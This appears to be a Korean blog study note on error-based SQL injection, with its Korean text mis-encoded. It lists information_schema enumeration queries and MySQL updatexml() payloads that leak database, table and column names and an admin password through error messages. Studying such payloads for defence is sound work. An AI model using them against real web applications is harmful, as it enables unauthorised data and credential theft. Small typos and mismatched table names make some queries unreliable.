์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

SQL Injection - Error Based

  • -
๋ฐ˜์‘ํ˜•
์ˆœ์ฐจ์  ์ ‘๊ทผ ๋ฐฉ์‹
๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„ ํ™•์ธ

# ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„ ํ™•์ธ
SELECT * FROM information_schema.schemata
SCHEMA_NAME ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„์„ ๋ชจ์•„๋†“์€ ํ•ญ๋ชฉ

 

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ํ…Œ์ด๋ธ” ๋ชฉ๋กํ™”

# ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ํ…Œ์ด๋ธ” ๋ชฉ๋กํ™”
SELECT * FROM information_schema.talbes;
TABLE_SCHEMA ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„
TABLE_NAME ํ…Œ์ด๋ธ” ์ด๋ฆ„
COLUMN_NAME ์ปฌ๋Ÿผ ์ด๋ฆ„

 

'board'๋ผ๋Š” ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์— ๋“ค์–ด์žˆ๋Š” 'table'์ด๋ฆ„๋“ค์ด ์•Œ๊ณ  ์‹ถ์„๋•Œ

# 'board'๋ผ๋Š” ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์— ๋“ค์–ด์žˆ๋Š” 'table'์ด๋ฆ„๋“ค์ด ์•Œ๊ณ  ์‹ถ์„๋•Œ
SELECT table_name FROM information_schema.tables WHERE table_schema='board';

 

board๋ผ๋Š” ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์— ์žˆ๋Š” member์ด๋ผ๋Š” ํ…Œ์ด๋ธ”์— ์ปฌ๋Ÿผ ์ด๋ฆ„์„ ์•Œ๊ณ  ์‹ถ์„ ๋•Œ

# board๋ผ๋Š” ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์— ์žˆ๋Š” member์ด๋ผ๋Š” ํ…Œ์ด๋ธ”์— ์ปฌ๋Ÿผ ์ด๋ฆ„์„ ์•Œ๊ณ  ์‹ถ์„ ๋•Œ
SELECT column_name FROM information_schema.columns WHERE table_schema='board' and table_name='members';

 

board.members์— ์žˆ๋Š” ๋ชจ๋“  ๋ฐ์ดํ„ฐ ํ™•์ธ

# board.members์— ์žˆ๋Š” ๋ชจ๋“  ๋ฐ์ดํ„ฐ ํ™•์ธ
SELECT * FROM board.members;

 

 board.members์— id๊ฐ€ admin์ธ ๊ณ ๊ฐ์˜ password ๋ฐ์ดํ„ฐ ํ™•์ธ

#  board.members์— id๊ฐ€ admin์ธ ๊ณ ๊ฐ์˜ password๋ฅผ ์•Œ์•„๋‚ผ๋•Œ
SELECT password FROM board.members WHERE id='admin';

 

๋น„ ์ˆœ์ฐจ์  ์ ‘๊ทผ ๋ฐฉ์‹
๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„ ํ™•์ธ

# ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„ ํ™•์ธ - ๋” ์ด์ƒ ๋ฐ์ดํ„ฐ ์˜ค๋ฅ˜๊ฐ€ ๋œจ์ง€ ์•Š์•„์•ผ ๋
' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata LIMIT 0,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata LIMIT 1,1)),0x0a) #
...

 

board ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์•ˆ์— ์žˆ๋Š” ํ…Œ์ด๋ธ” ์ด๋ฆ„ ํ™•์ธ

' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 0,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 1,1)),0x0a) #

 

board ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ members์— ์žˆ๋Š” ์ปฌ๋Ÿผ ์ด๋ฆ„ ํ™•์ธ

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 0,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 1,1)),0x0a) #

 

board ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ members์— ์žˆ๋Š” id ์ฒซ๋ฒˆ์งธ ๋ฐ์ดํ„ฐ ํ™•์ธ

' and updatexml (0x0a,concat(0x0a,(SELECT id FROM members LIMIT 0,1)),0x0a) #

 

board ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ members์— ์žˆ๋Š” id ์ฒซ๋ฒˆ์งธ ๋ฐ์ดํ„ฐ ํ™•์ธ

' and updatexml (0x0a,concat(0x0a,(SELECT password FROM members LIMIT 0,1)),0x0a) #

 

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

CODE Injection  (0) 2022.07.07
SQL Injection ์ธ์ฆ ์šฐํšŒ  (0) 2022.07.07
Oracle Blind Based  (0) 2022.07.06
ORACLE Union Based  (0) 2022.07.06
Oracle database ๊ณต๊ฒฉ ์‹ค์Šต  (0) 2022.07.05
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.